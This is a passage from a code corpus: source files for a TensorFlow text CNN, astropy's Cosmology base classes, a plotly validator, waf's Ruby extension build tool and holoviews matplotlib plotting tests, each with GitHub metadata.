W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name="b")
conv = tf.nn.conv2d(
self.embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# Maxpooling over the outputs
pooled = tf.nn.max_pool(
h,
ksize=[1, sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID',
name="pool")
pooled_outputs.append(pooled)
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
self.h_pool = tf.concat(3, pooled_outputs)
self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])
# Add dropout
with tf.name_scope("dropout"):
self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)
#self.h_drop = self.h_pool_flat
# self.h_drop = highway(self.h_drop, self.h_drop.get_shape()[1], 4, 0.1)
# Final (unnormalized) scores and predictions
with tf.name_scope("output"):
W = tf.get_variable(
"W",
shape=[num_filters_total, num_classes],
initializer=tf.contrib.layers.xavier_initializer())
b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name="b")
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
self.scores = tf.nn.log_softmax(tf.nn.xw_plus_b(self.h_drop, W, b, name="scores"))
self.predictions = tf.argmax(self.scores, 1, name="predictions")
# CalculateMean cross-entropy loss
with tf.name_scope("loss"):
losses = tf.contrib.losses.softmax_cross_entropy(self.scores, self.input_y, label_smoothing = self.label_smoothing)
selflosses = tf.contrib.losses.softmax_cross_entropy(tf.cast(self.input_y, tf.float32),
tf.cast(self.input_y, tf.float32), label_smoothing = self.label_smoothing)
self.kl = tf.reduce_mean(losses - selflosses)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
# Accuracy
with tf.name_scope("accuracy"):
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
| {
"content_hash": "b3b0bec0dadd187f91ecdc5ae9ec70f7",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 177,
"avg_line_length": 51.009803921568626,
"alnum_prop": 0.5708245243128964,
"repo_name": "windowsyuli/cross_domain",
"id": "13839f856b62f11e213681e5db831b6fafea3f92",
"size": "5203",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neuralnet/single_cnn_highway.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "50032"
},
{
"name": "Makefile",
"bytes": "718"
},
{
"name": "Python",
"bytes": "120906"
},
{
"name": "Shell",
"bytes": "10170"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import abc
import inspect
from typing import TYPE_CHECKING, Any, Mapping, TypeVar
import numpy as np
from astropy.io.registry import UnifiedReadWriteMethod
from astropy.utils.decorators import classproperty
from astropy.utils.metadata import MetaData
from .connect import (
CosmologyFromFormat,
CosmologyRead,
CosmologyToFormat,
CosmologyWrite,
)
from .parameter import Parameter
if TYPE_CHECKING: # pragma: no cover
from astropy.cosmology.funcs.comparison import _FormatType
# Originally authored by Andrew Becker (becker@astro.washington.edu),
# and modified by Neil Crighton (neilcrighton@gmail.com), Roban Kramer
# (robanhk@gmail.com), and Nathaniel Starkman (n.starkman@mail.utoronto.ca).
# Many of these adapted from Hogg 1999, astro-ph/9905116
# and Linder 2003, PRL 90, 91301
__all__ = ["Cosmology", "CosmologyError", "FlatCosmologyMixin"]
__doctest_requires__ = {} # needed until __getattr__ removed
##############################################################################
# Parameters
# registry of cosmology classes with {key=name : value=class}
_COSMOLOGY_CLASSES = dict()
# typing
_CosmoT = TypeVar("_CosmoT", bound="Cosmology")
_FlatCosmoT = TypeVar("_FlatCosmoT", bound="FlatCosmologyMixin")
##############################################################################
class CosmologyError(Exception):
pass
class Cosmology(metaclass=abc.ABCMeta):
"""Base-class for all Cosmologies.
Parameters
----------
*args
Arguments into the cosmology; used by subclasses, not this base class.
name : str or None (optional, keyword-only)
The name of the cosmology.
meta : dict or None (optional, keyword-only)
Metadata for the cosmology, e.g., a reference.
**kwargs
Arguments into the cosmology; used by subclasses, not this base class.
Notes
-----
Class instances are static -- you cannot (and should not) change the values
of the parameters. That is, all of the above attributes (except meta) are
read only.
For details on how to create performant custom subclasses, see the
documentation on :ref:`astropy-cosmology-fast-integrals`.
"""
meta = MetaData()
# Unified I/O object interchange methods
from_format = UnifiedReadWriteMethod(CosmologyFromFormat)
to_format = UnifiedReadWriteMethod(CosmologyToFormat)
# Unified I/O read and write methods
read = UnifiedReadWriteMethod(CosmologyRead)
write = UnifiedReadWriteMethod(CosmologyWrite)
# Parameters
__parameters__: tuple[str, ...] = ()
__all_parameters__: tuple[str, ...] = ()
# ---------------------------------------------------------------
def __init_subclass__(cls):
super().__init_subclass__()
# -------------------
# Parameters
# Get parameters that are still Parameters, either in this class or above.
parameters = []
derived_parameters = []
for n in cls.__parameters__:
p = getattr(cls, n)
if isinstance(p, Parameter):
derived_parameters.append(n) if p.derived else parameters.append(n)
# Add new parameter definitions
for n, v in cls.__dict__.items():
if n in parameters or n.startswith("_") or not isinstance(v, Parameter):
continue
derived_parameters.append(n) if v.derived else parameters.append(n)
# reorder to match signature
ordered = [
parameters.pop(parameters.index(n))
for n in cls._init_signature.parameters.keys()
if n in parameters
]
parameters = ordered + parameters # place "unordered" at the end
cls.__parameters__ = tuple(parameters)
cls.__all_parameters__ = cls.__parameters__ + tuple(derived_parameters)
# -------------------
# register as a Cosmology subclass
_COSMOLOGY_CLASSES[cls.__qualname__] = cls
@classproperty(lazy=True)
def _init_signature(cls):
"""Initialization signature (without 'self')."""
# get signature, dropping "self" by taking arguments [1:]
sig = inspect.signature(cls.__init__)
sig = sig.replace(parameters=list(sig.parameters.values())[1:])
return sig
# ---------------------------------------------------------------
def __init__(self, name=None, meta=None):
self._name = str(name) if name is not None else name
self.meta.update(meta or {})
@property
def name(self):
"""The name of the Cosmology instance."""
return self._name
@property
@abc.abstractmethod
def is_flat(self):
"""
Return bool; `True` if the cosmology is flat.
This is abstract and must be defined in subclasses.
"""
raise NotImplementedError("is_flat is not implemented")
def clone(self, *, meta=None, **kwargs):
"""Returns a copy of this object with updated parameters, as specified.
This cannot be used to change the type of the cosmology, so ``clone()``
cannot be used to change between flat and non-flat cosmologies.
Parameters
----------
meta : mapping or None (optional, keyword-only)
Metadata that will update the current metadata.
**kwargs
Cosmology parameter (and name) modifications. If any parameter is
changed and a new name is not given, the name will be set to "[old
name] (modified)".
Returns
-------
newcosmo : `~astropy.cosmology.Cosmology` subclass instance
A new instance of this class with updated parameters as specified.
If no arguments are given, then a reference to this object is
returned instead of copy.
Examples
--------
To make a copy of the ``Planck13`` cosmology with a different matter
density (``Om0``), and a new name:
>>> from astropy.cosmology import Planck13
>>> Planck13.clone(name="Modified Planck 2013", Om0=0.35)
FlatLambdaCDM(name="Modified Planck 2013", H0=67.77 km / (Mpc s),
Om0=0.35, ...
If no name is specified, the new name will note the modification.
>>> Planck13.clone(Om0=0.35).name
'Planck13 (modified)'
"""
# Quick return check, taking advantage of the Cosmology immutability.
if meta is None and not kwargs:
return self
# There are changed parameter or metadata values.
# The name needs to be changed accordingly, if it wasn't already.
_modname = self.name + " (modified)"
kwargs.setdefault("name", (_modname if self.name is not None else None))
# mix new meta into existing, preferring the former.
meta = meta if meta is not None else {}
new_meta = {**self.meta, **meta}
# Mix kwargs into initial arguments, preferring the former.
new_init = {**self._init_arguments, "meta": new_meta, **kwargs}
# Create BoundArgument to handle args versus kwargs.
# This also handles all errors from mismatched arguments
ba = self._init_signature.bind_partial(**new_init)
# Instantiate, respecting args vs kwargs
cloned = type(self)(*ba.args, **ba.kwargs)
# Check if nothing has changed.
# TODO! or should return self?
if (cloned.name == _modname) and not meta and cloned.is_equivalent(self):
cloned._name = self.name
return cloned
@property
def _init_arguments(self):
# parameters
kw = {n: getattr(self, n) for n in self.__parameters__}
# other info
kw["name"] = self.name
kw["meta"] = self.meta
return kw
# ---------------------------------------------------------------
# comparison methods
def is_equivalent(self, other: Any, /, *, format: _FormatType = False) -> bool:
r"""Check equivalence between Cosmologies.
Two cosmologies may be equivalent even if not the same class.
For example, an instance of ``LambdaCDM`` might have :math:`\Omega_0=1`
and :math:`\Omega_k=0` and therefore be flat, like ``FlatLambdaCDM``.
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object to which to compare.
format : bool or None or str, optional keyword-only
Whether to allow, before equivalence is checked, the object to be
converted to a |Cosmology|. This allows, e.g. a |Table| to be
equivalent to a Cosmology.
`False` (default) will not allow conversion. `True` or `None` will,
and will use the auto-identification to try to infer the correct
format. A `str` is assumed to be the correct format to use when
converting.
``format`` is broadcast to match the shape of ``other``.
Note that the cosmology arguments are not broadcast against
``format``, so it cannot determine the output shape.
Returns
-------
bool
True if cosmologies are equivalent, False otherwise.
Examples
--------
Two cosmologies may be equivalent even if not of the same class.
In this examples the ``LambdaCDM`` has ``Ode0`` set to the same value
calculated in ``FlatLambdaCDM``.
>>> import astropy.units as u
>>> from astropy.cosmology import LambdaCDM, FlatLambdaCDM
>>> cosmo1 = LambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3, 0.7)
>>> cosmo2 = FlatLambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3)
>>> cosmo1.is_equivalent(cosmo2)
True
While in this example, the cosmologies are not equivalent.
>>> cosmo3 = FlatLambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3, Tcmb0=3 * u.K)
>>> cosmo3.is_equivalent(cosmo2)
False
Also, using the keyword argument, the notion of equivalence is extended
to any Python object that can be converted to a |Cosmology|.
>>> from astropy.cosmology import Planck18
>>> tbl = Planck18.to_format("astropy.table")
>>> Planck18.is_equivalent(tbl, format=True)
True
The list of valid formats, e.g. the |Table| in this example, may be
checked with ``Cosmology.from_format.list_formats()``.
As can be seen in the list of formats, not all formats can be
auto-identified by ``Cosmology.from_format.registry``. Objects of
these kinds can still be checked for equivalence, but the correct
format string must be used.
>>> tbl = Planck18.to_format("yaml")
>>> Planck18.is_equivalent(tbl, format="yaml")
True
"""
from .funcs import cosmology_equal
try:
return cosmology_equal(
self, other, format=(None, format), allow_equivalent=True
)
except Exception:
# `is_equivalent` allows `other` to be any object and returns False
# if `other` cannot be converted to a Cosmology, rather than
# raising an Exception.
return False
def __equiv__(self, other: Any, /) -> bool:
"""Cosmology equivalence. Use ``.is_equivalent()`` for actual check!
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object in which to compare.
Returns
-------
bool or `NotImplemented`
`NotImplemented` if ``other`` is from a different class.
`True` if ``other`` is of the same class and has matching parameters
and parameter values.
`False` otherwise.
"""
if other.__class__ is not self.__class__:
return NotImplemented # allows other.__equiv__
# Check all parameters in 'other' match those in 'self' and 'other' has
# no extra parameters (latter part should never happen b/c same class)
return set(self.__all_parameters__) == set(other.__all_parameters__) and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__all_parameters__
)
def __eq__(self, other: Any, /) -> bool:
"""Check equality between Cosmologies.
Checks the Parameters and immutable fields (i.e. not "meta").
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object in which to compare.
Returns
-------
bool
`True` if Parameters and names are the same, `False` otherwise.
"""
if other.__class__ is not self.__class__:
return NotImplemented # allows other.__eq__
eq = (
# non-Parameter checks: name
self.name == other.name
# check all parameters in 'other' match those in 'self' and 'other'
# has no extra parameters (latter part should never happen b/c same
# class) TODO! element-wise when there are array cosmologies
and set(self.__all_parameters__) == set(other.__all_parameters__)
and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__all_parameters__
)
)
return eq
# ---------------------------------------------------------------
def __repr__(self):
namelead = f"{self.__class__.__qualname__}("
if self.name is not None:
namelead += f'name="{self.name}", '
# nicely formatted parameters
fmtps = (f"{k}={getattr(self, k)}" for k in self.__parameters__)
return namelead + ", ".join(fmtps) + ")"
def __astropy_table__(self, cls, copy, **kwargs):
"""Return a `~astropy.table.Table` of type ``cls``.
Parameters
----------
cls : type
Astropy ``Table`` class or subclass.
copy : bool
Ignored.
**kwargs : dict, optional
Additional keyword arguments. Passed to ``self.to_format()``.
See ``Cosmology.to_format.help("astropy.table")`` for allowed kwargs.
Returns
-------
`astropy.table.Table` or subclass instance
Instance of type ``cls``.
"""
return self.to_format("astropy.table", cls=cls, **kwargs)
class FlatCosmologyMixin(metaclass=abc.ABCMeta):
"""
Mixin class for flat cosmologies. Do NOT instantiate directly.
Note that all instances of ``FlatCosmologyMixin`` are flat, but not all
flat cosmologies are instances of ``FlatCosmologyMixin``. As example,
``LambdaCDM`` **may** be flat (for the a specific set of parameter values),
but ``FlatLambdaCDM`` **will** be flat.
"""
__all_parameters__: tuple[str, ...]
__parameters__: tuple[str, ...]
def __init_subclass__(cls: type[_FlatCosmoT]) -> None:
super().__init_subclass__()
# Determine the non-flat class.
# This will raise a TypeError if the MRO is inconsistent.
cls.__nonflatclass__
# ===============================================================
@classmethod # TODO! make metaclass-method
def _get_nonflat_cls(
cls, kls: type[_CosmoT] | None = None
) -> type[Cosmology] | None:
"""Find the corresponding non-flat class.
The class' bases are searched recursively.
Parameters
----------
kls : :class:`astropy.cosmology.Cosmology` class or None, optional
If `None` (default) this class is searched instead of `kls`.
Raises
------
TypeError
If more than one non-flat class is found at the same level of the
inheritance. This is similar to the error normally raised by Python
for an inconsistent method resolution order.
Returns
-------
type
A :class:`Cosmology` subclass this class inherits from that is not a
:class:`FlatCosmologyMixin` subclass.
"""
_kls = cls if kls is None else kls
# Find non-flat classes
nonflat: set[type[Cosmology]]
nonflat = {
b
for b in _kls.__bases__
if issubclass(b, Cosmology) and not issubclass(b, FlatCosmologyMixin)
}
if not nonflat: # e.g. subclassing FlatLambdaCDM
nonflat = {
k for b in _kls.__bases__ if (k := cls._get_nonflat_cls(b)) is not None
}
if len(nonflat) > 1:
raise TypeError(
"cannot create a consistent non-flat class resolution order "
f"for {_kls} with bases {nonflat} at the same inheritance level."
)
if not nonflat: # e.g. FlatFLRWMixin(FlatCosmologyMixin)
return None
return nonflat.pop()
__nonflatclass__ = classproperty(
_get_nonflat_cls, lazy=True, doc="Return the corresponding non-flat class."
)
# ===============================================================
@property
def is_flat(self):
"""Return `True`, the cosmology is flat."""
return True
@abc.abstractmethod
def nonflat(self: _FlatCosmoT) -> _CosmoT:
"""Return the equivalent non-flat-class instance of this cosmology."""
def clone(self, *, meta: Mapping | None = None, to_nonflat: bool = False, **kwargs):
"""Returns a copy of this object with updated parameters, as specified.
This cannot be used to change the type of the cosmology, except for
changing to the non-flat version of this cosmology.
Parameters
----------
meta : mapping or None (optional, keyword-only)
Metadata that will update the current metadata.
to_nonflat : bool, optional keyword-only
Whether to change to the non-flat version of this cosmology.
**kwargs
Cosmology parameter (and name) modifications. If any parameter is
changed and a new name is not given, the name will be set to "[old
name] (modified)".
Returns
-------
newcosmo : `~astropy.cosmology.Cosmology` subclass instance
A new instance of this class with updated parameters as specified.
If no arguments are given, then a reference to this object is
returned instead of copy.
Examples
--------
To make a copy of the ``Planck13`` cosmology with a different matter
density (``Om0``), and a new name:
>>> from astropy.cosmology import Planck13
>>> Planck13.clone(name="Modified Planck 2013", Om0=0.35)
FlatLambdaCDM(name="Modified Planck 2013", H0=67.77 km / (Mpc s),
Om0=0.35, ...
If no name is specified, the new name will note the modification.
>>> Planck13.clone(Om0=0.35).name
'Planck13 (modified)'
The keyword 'to_nonflat' can be used to clone on the non-flat equivalent
cosmology.
>>> Planck13.clone(to_nonflat=True)
LambdaCDM(name="Planck13", ...
>>> Planck13.clone(H0=70, to_nonflat=True)
LambdaCDM(name="Planck13 (modified)", H0=70.0 km / (Mpc s), ...
"""
if to_nonflat:
return self.nonflat.clone(meta=meta, **kwargs)
return super().clone(meta=meta, **kwargs)
# ===============================================================
def __equiv__(self, other):
"""flat-|Cosmology| equivalence.
Use `astropy.cosmology.funcs.cosmology_equal` with
``allow_equivalent=True`` for actual checks!
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance
The object to which to compare for equivalence.
Returns
-------
bool or `NotImplemented`
`True` if ``other`` is of the same class / non-flat class (e.g.
|FlatLambdaCDM| and |LambdaCDM|) has matching parameters and
parameter values.
`False` if ``other`` is of the same class but has different
parameters.
`NotImplemented` otherwise.
"""
if isinstance(other, FlatCosmologyMixin):
return super().__equiv__(other) # super gets from Cosmology
# check if `other` is the non-flat version of this class this makes the
# assumption that any further subclass of a flat cosmo keeps the same
# physics.
if not issubclass(other.__class__, self.__nonflatclass__):
return NotImplemented
# Check if have equivalent parameters and all parameters in `other`
# match those in `self`` and `other`` has no extra parameters.
params_eq = (
set(self.__all_parameters__) == set(other.__all_parameters__) # no extra
# equal
and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__parameters__
)
# flatness check
and other.is_flat
)
return params_eq
# -----------------------------------------------------------------------------
def __getattr__(attr):
from . import flrw
if hasattr(flrw, attr) and attr not in ("__path__",):
import warnings
from astropy.utils.exceptions import AstropyDeprecationWarning
warnings.warn(
f"`astropy.cosmology.core.{attr}` has been moved (since v5.0) and "
f"should be imported as ``from astropy.cosmology import {attr}``."
" In future this will raise an exception.",
AstropyDeprecationWarning,
)
return getattr(flrw, attr)
raise AttributeError(f"module {__name__!r} has no attribute {attr!r}.")
| {
"content_hash": "829957447cac7503037c0210d9efc8f4",
"timestamp": "",
"source": "github",
"line_count": 610,
"max_line_length": 88,
"avg_line_length": 36.15573770491803,
"alnum_prop": 0.5745635910224439,
"repo_name": "pllim/astropy",
"id": "6de217588c67b1124418f1fb4ff64605975389e1",
"size": "22120",
"binary": false,
"copies": "3",
"ref": "refs/heads/placeholder",
"path": "astropy/cosmology/core.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11040101"
},
{
"name": "C++",
"bytes": "47001"
},
{
"name": "Cython",
"bytes": "78776"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "183333"
},
{
"name": "M4",
"bytes": "18757"
},
{
"name": "Makefile",
"bytes": "52508"
},
{
"name": "Python",
"bytes": "12404182"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class FamilysrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="familysrc", parent_name="scattergl.hoverlabel.font", **kwargs
):
super(FamilysrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| {
"content_hash": "4030a8ee09fd98da66a7c9ccddea1e0a",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 88,
"avg_line_length": 34,
"alnum_prop": 0.6029411764705882,
"repo_name": "plotly/python-api",
"id": "7bf4315987dc3f4723f006b407d4e41210adfdfd",
"size": "476",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/scattergl/hoverlabel/font/_familysrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
"""
Support for Ruby extensions. A C/C++ compiler is required::
def options(opt):
opt.load('compiler_c ruby')
def configure(conf):
conf.load('compiler_c ruby')
conf.check_ruby_version((1,8,0))
conf.check_ruby_ext_devel()
conf.check_ruby_module('libxml')
def build(bld):
bld(
features = 'c cshlib rubyext',
source = 'rb_mytest.c',
target = 'mytest_ext',
install_path = '${ARCHDIR_RUBY}')
bld.install_files('${LIBDIR_RUBY}', 'Mytest.rb')
"""
import os
from waflib import Errors, Options, Task, Utils
from waflib.TaskGen import before_method, feature, extension
from waflib.Configure import conf
@feature('rubyext')
@before_method('apply_incpaths', 'process_source', 'apply_bundle', 'apply_link')
def init_rubyext(self):
"""
Add required variables for ruby extensions
"""
self.install_path = '${ARCHDIR_RUBY}'
self.uselib = self.to_list(getattr(self, 'uselib', ''))
if not 'RUBY' in self.uselib:
self.uselib.append('RUBY')
if not 'RUBYEXT' in self.uselib:
self.uselib.append('RUBYEXT')
@feature('rubyext')
@before_method('apply_link', 'propagate_uselib_vars')
def apply_ruby_so_name(self):
"""
Strip the *lib* prefix from ruby extensions
"""
self.env.cshlib_PATTERN = self.env.cxxshlib_PATTERN = self.env.rubyext_PATTERN
@conf
def check_ruby_version(self, minver=()):
"""
Checks if ruby is installed.
If installed the variable RUBY will be set in environment.
The ruby binary can be overridden by ``--with-ruby-binary`` command-line option.
"""
ruby = self.find_program('ruby', var='RUBY', value=Options.options.rubybinary)
try:
version = self.cmd_and_log(ruby + ['-e', 'puts defined?(VERSION) ? VERSION : RUBY_VERSION']).strip()
except Errors.WafError:
self.fatal('could not determine ruby version')
self.env.RUBY_VERSION = version
try:
ver = tuple(map(int, version.split('.')))
except Errors.WafError:
self.fatal('unsupported ruby version %r' % version)
cver = ''
if minver:
cver = '> ' + '.'.join(str(x) for x in minver)
if ver < minver:
self.fatal('ruby is too old %r' % ver)
self.msg('Checking for ruby version %s' % cver, version)
@conf
def check_ruby_ext_devel(self):
"""
Check if a ruby extension can be created
"""
if not self.env.RUBY:
self.fatal('ruby detection is required first')
if not self.env.CC_NAME and not self.env.CXX_NAME:
self.fatal('load a c/c++ compiler first')
version = tuple(map(int, self.env.RUBY_VERSION.split(".")))
def read_out(cmd):
return Utils.to_list(self.cmd_and_log(self.env.RUBY + ['-rrbconfig', '-e', cmd]))
def read_config(key):
return read_out('puts RbConfig::CONFIG[%r]' % key)
cpppath = archdir = read_config('archdir')
if version >= (1, 9, 0):
ruby_hdrdir = read_config('rubyhdrdir')
cpppath += ruby_hdrdir
if version >= (2, 0, 0):
cpppath += read_config('rubyarchhdrdir')
cpppath += [os.path.join(ruby_hdrdir[0], read_config('arch')[0])]
self.check(header_name='ruby.h', includes=cpppath, errmsg='could not find ruby header file', link_header_test=False)
self.env.LIBPATH_RUBYEXT = read_config('libdir')
self.env.LIBPATH_RUBYEXT += archdir
self.env.INCLUDES_RUBYEXT = cpppath
self.env.CFLAGS_RUBYEXT = read_config('CCDLFLAGS')
self.env.rubyext_PATTERN = '%s.' + read_config('DLEXT')[0]
# ok this is really stupid, but the command and flags are combined.
# so we try to find the first argument...
flags = read_config('LDSHARED')
while flags and flags[0][0] != '-':
flags = flags[1:]
# we also want to strip out the deprecated ppc flags
if len(flags) > 1 and flags[1] == "ppc":
flags = flags[2:]
self.env.LINKFLAGS_RUBYEXT = flags
self.env.LINKFLAGS_RUBYEXT += read_config('LIBS')
self.env.LINKFLAGS_RUBYEXT += read_config('LIBRUBYARG_SHARED')
if Options.options.rubyarchdir:
self.env.ARCHDIR_RUBY = Options.options.rubyarchdir
else:
self.env.ARCHDIR_RUBY = read_config('sitearchdir')[0]
if Options.options.rubylibdir:
self.env.LIBDIR_RUBY = Options.options.rubylibdir
else:
self.env.LIBDIR_RUBY = read_config('sitelibdir')[0]
@conf
def check_ruby_module(self, module_name):
"""
Check if the selected ruby interpreter can require the given ruby module::
def configure(conf):
conf.check_ruby_module('libxml')
:param module_name: module
:type module_name: string
"""
self.start_msg('Ruby module %s' % module_name)
try:
self.cmd_and_log(self.env.RUBY + ['-e', 'require \'%s\';puts 1' % module_name])
except Errors.WafError:
self.end_msg(False)
self.fatal('Could not find the ruby module %r' % module_name)
self.end_msg(True)
@extension('.rb')
def process(self, node):
return self.create_task('run_ruby', node)
class run_ruby(Task.Task):
"""
Task to run ruby files detected by file extension .rb::
def options(opt):
opt.load('ruby')
def configure(ctx):
ctx.check_ruby_version()
def build(bld):
bld.env.RBFLAGS = '-e puts "hello world"'
bld(source='a_ruby_file.rb')
"""
run_str = '${RUBY} ${RBFLAGS} -I ${SRC[0].parent.abspath()} ${SRC}'
def options(opt):
"""
Add the ``--with-ruby-archdir``, ``--with-ruby-libdir`` and ``--with-ruby-binary`` options
"""
opt.add_option('--with-ruby-archdir', type='string', dest='rubyarchdir', help='Specify directory where to install arch specific files')
opt.add_option('--with-ruby-libdir', type='string', dest='rubylibdir', help='Specify alternate ruby library path')
opt.add_option('--with-ruby-binary', type='string', dest='rubybinary', help='Specify alternate ruby binary')
| {
"content_hash": "765c198091b5689ae52ef0b85684c2eb",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 136,
"avg_line_length": 30.204419889502763,
"alnum_prop": 0.6873971099323212,
"repo_name": "MarekIgnaszak/econ-project-templates",
"id": "8d92a79a16179d3b62d957135b0d73c34e35710d",
"size": "5579",
"binary": false,
"copies": "49",
"ref": "refs/heads/python",
"path": ".mywaflib/waflib/Tools/ruby.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "663"
},
{
"name": "Jupyter Notebook",
"bytes": "3572"
},
{
"name": "Python",
"bytes": "1222989"
},
{
"name": "Shell",
"bytes": "1716"
},
{
"name": "TeX",
"bytes": "14224"
}
],
"symlink_target": ""
} |
import numpy as np
from holoviews.core.spaces import DynamicMap
from holoviews.element import Image, Curve, Scatter, Scatter3D
from holoviews.streams import Stream
from .test_plot import TestMPLPlot, mpl_renderer
try:
from matplotlib.ticker import FormatStrFormatter, FuncFormatter, PercentFormatter
except:
pass
class TestElementPlot(TestMPLPlot):
def test_stream_cleanup(self):
stream = Stream.define(str('Test'), test=1)()
dmap = DynamicMap(lambda test: Curve([]), streams=[stream])
plot = mpl_renderer.get_plot(dmap)
self.assertTrue(bool(stream._subscribers))
plot.cleanup()
self.assertFalse(bool(stream._subscribers))
def test_element_hooks(self):
def hook(plot, element):
plot.handles['title'].set_text('Called')
curve = Curve(range(10), label='Not Called').opts(hooks=[hook])
plot = mpl_renderer.get_plot(curve)
self.assertEqual(plot.handles['title'].get_text(), 'Called')
def test_element_font_scaling(self):
curve = Curve(range(10)).options(fontscale=2, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 24)
self.assertEqual(ax.xaxis.label.get_fontsize(), 20)
self.assertEqual(ax.yaxis.label.get_fontsize(), 20)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 20)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_font_scaling_fontsize_override_common(self):
curve = Curve(range(10)).options(fontscale=2, fontsize=14, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 28)
self.assertEqual(ax.xaxis.label.get_fontsize(), 28)
self.assertEqual(ax.yaxis.label.get_fontsize(), 28)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 20)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_font_scaling_fontsize_override_specific(self):
curve = Curve(range(10)).options(
fontscale=2, fontsize={'title': 16, 'xticks': 12, 'xlabel': 6}, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 32)
self.assertEqual(ax.xaxis.label.get_fontsize(), 12)
self.assertEqual(ax.yaxis.label.get_fontsize(), 20)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 24)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_xlabel(self):
element = Curve(range(10)).options(xlabel='custom x-label')
axes = mpl_renderer.get_plot(element).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_element_ylabel(self):
element = Curve(range(10)).options(ylabel='custom y-label')
axes = mpl_renderer.get_plot(element).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
def test_element_xformatter_string(self):
curve = Curve(range(10)).options(xformatter='%d')
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIsInstance(xformatter, FormatStrFormatter)
self.assertEqual(xformatter.fmt, '%d')
def test_element_yformatter_string(self):
curve = Curve(range(10)).options(yformatter='%d')
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIsInstance(yformatter, FormatStrFormatter)
self.assertEqual(yformatter.fmt, '%d')
def test_element_zformatter_string(self):
curve = Scatter3D([]).options(zformatter='%d')
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIsInstance(zformatter, FormatStrFormatter)
self.assertEqual(zformatter.fmt, '%d')
def test_element_xformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Curve(range(10)).options(xformatter=formatter)
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIsInstance(xformatter, FuncFormatter)
def test_element_yformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Curve(range(10)).options(yformatter=formatter)
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIsInstance(yformatter, FuncFormatter)
def test_element_zformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Scatter3D([]).options(zformatter=formatter)
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIsInstance(zformatter, FuncFormatter)
def test_element_xformatter_instance(self):
formatter = PercentFormatter()
